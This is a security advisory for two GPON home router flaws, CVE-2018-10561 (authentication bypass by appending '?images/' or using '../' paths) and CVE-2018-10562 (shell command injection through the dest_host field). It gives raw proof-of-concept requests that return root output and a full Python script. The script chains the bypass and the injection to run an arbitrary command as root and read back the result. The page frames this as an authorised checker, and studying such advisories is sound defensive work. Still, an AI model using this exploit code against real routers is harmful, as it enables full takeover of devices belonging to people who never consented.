CVE-2018-10562 - RCE

Description

An issue was discovered in the GPON ONT Home Gateway Router web administration interface. Remote command execution can be triggered by sending an HTTP POST request to the 'GponForm/diag_Form' URI with a malicious shell command appended to the dest_host parameter. Because the router saves the ping and traceroute command output in /tmp and returns it to the user when /diag.html is revisited, an attacker can execute arbitrary commands (as root, per the PoC below) and retrieve their output. This allows an attacker to fully control the target device.

Solution

Consult your vendor for a patch or a workaround.

See Also

https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/

POC

POST: /GponForm/diag_Form?images/ BODY: XWebPageName=diag&diag_action=tracert&wan_conlist=0&dest_host=fYM7K2qD;`id`;id;fYM7K2qD
Result: ;uid=0(root) gid=0(root);id;

GET: /GponForm/diag_Form?images/&XWebPageName=diag&diag_action=tracert&wan_conlist=0&dest_host=fYM7K2qD;`id`;id;fYM7K2qD
Result: ;uid=0(root) gid=0(root);id;

CVE-2018-10561 - Auth Bypass

Description

An issue was discovered in GPON ONT Home Gateway Router web administration interface. It is possible to bypass authentication of web interface by using the following approach:

http(s)://<Router IP>/<some file>?images/- 
http(s)://<Router IP>/<some file>?style/- 
http(s)://<Router IP>/<some file>?script/- 
http(s)://<Router IP>/images/../<some file>- 
http(s)://<Router IP>/style/../<some file>- 
http(s)://<Router IP>/script/../<some file> 

For example, /menu.html?images/ or /GponForm/diag_FORM?images/ URI. The CVE-2018-10562 PoC above reaches /GponForm/diag_Form through this same bypass. This allows an attacker to fully control the target device.
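The following checker is an added example written for this page; it is not code from the advisory's author, the vendor, or the vpnmentor write-up. It turns the two descriptions above into testable pieces: the six URL shapes for the CVE-2018-10561 auth bypass, the CVE-2018-10562 diag_Form request body with the injected command wrapped in a marker (the page's PoC uses the fixed marker fYM7K2qD and a redundant bare `id`; here the marker is random per run and only the backtick substitution is kept), and a parser that pulls the command output back out of the reflected result. The hostnames, the /diag.html response layout in the constructed sample, and the 200-vs-non-200 heuristic for the bypass are assumptions, not facts from the advisory.

```python
"""Offline-testable checker for CVE-2018-10561 (auth bypass) and
CVE-2018-10562 (command injection) as described in the advisory text.
Example code added for this page; not the advisory author's or vendor's code."""
import re
import secrets
import urllib.error
import urllib.parse
import urllib.request

# URIs quoted in the advisory; the bypass prefixes are the three it lists.
DIAG_FORM = "/GponForm/diag_Form"
DIAG_PAGE = "/diag.html"
BYPASS_DIRS = ("images/", "style/", "script/")

# Constructed sample of a /diag.html body after the PoC ran (assumed layout).
SAMPLE_DIAG_PAGE = (
    "<html><body><pre>traceroute to "
    "fYM7K2qD;uid=0(root) gid=0(root);fYM7K2qD"
    "</pre></body></html>"
)


def bypass_urls(base, path):
    """The six URL shapes listed for CVE-2018-10561, in the advisory's order."""
    base, path = base.rstrip("/"), path.lstrip("/")
    query_form = [f"{base}/{path}?{d}" for d in BYPASS_DIRS]
    traversal_form = [f"{base}/{d}../{path}" for d in BYPASS_DIRS]
    return query_form + traversal_form


def build_diag_body(command, marker):
    """Form body for the CVE-2018-10562 POST. dest_host carries the command
    in backticks, bracketed by the marker so its output can be located later.
    urlencode percent-encodes ';' and '`'; the page's raw PoC sends them bare."""
    dest_host = f"{marker};`{command}`;{marker}"
    return urllib.parse.urlencode({
        "XWebPageName": "diag",
        "diag_action": "tracert",
        "wan_conlist": "0",
        "dest_host": dest_host,
    })


def extract_output(page_text, marker):
    """Return the text between '<marker>;' and ';<marker>' in the reflected
    result, or None if the marker never appears (no execution, or no bypass)."""
    pattern = re.escape(marker) + r";(.*?);" + re.escape(marker)
    m = re.search(pattern, page_text, re.S)
    return m.group(1).strip() if m else None


def _http(url, body=None, timeout=10):
    """Minimal GET/POST returning (status, text); HTTP errors are not raised."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method="POST" if data else "GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_auth_bypass(base, path="/menu.html"):
    """Return the bypass URLs that answer 200 while the plain path does not.
    Heuristic only: firmware that serves the login form with 200 needs a
    content comparison instead of a status comparison."""
    plain_status, _ = _http(f"{base.rstrip('/')}{path}")
    if plain_status == 200:
        return []
    return [u for u in bypass_urls(base, path) if _http(u)[0] == 200]


def check_rce(base, command="id"):
    """Run the advisory's two-step PoC: POST through the bypass, then read
    the stored result from /diag.html (also through the bypass)."""
    base = base.rstrip("/")
    marker = secrets.token_hex(4)
    _http(f"{base}{DIAG_FORM}?images/", body=build_diag_body(command, marker))
    _, page = _http(f"{base}{DIAG_PAGE}?images/")
    return extract_output(page, marker)


if __name__ == "__main__":
    import sys
    # Offline demonstration on the constructed sample, then a live run if a
    # base URL such as http://192.0.2.1 is given as the first argument.
    print("sample ->", extract_output(SAMPLE_DIAG_PAGE, "fYM7K2qD"))
    if len(sys.argv) > 1:
        print("bypass hits:", check_auth_bypass(sys.argv[1]))
        print("rce output :", check_rce(sys.argv[1]))
```

Only run check_auth_bypass and check_rce against devices you are authorised to test; the injected command runs as root on the gateway, so keep it to something harmless such as id. The marker-based extraction is what makes the check reliable: without a unique marker, the /diag.html page may still hold output from an earlier run.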

Solution

Consult your vendor for a patch or a workaround.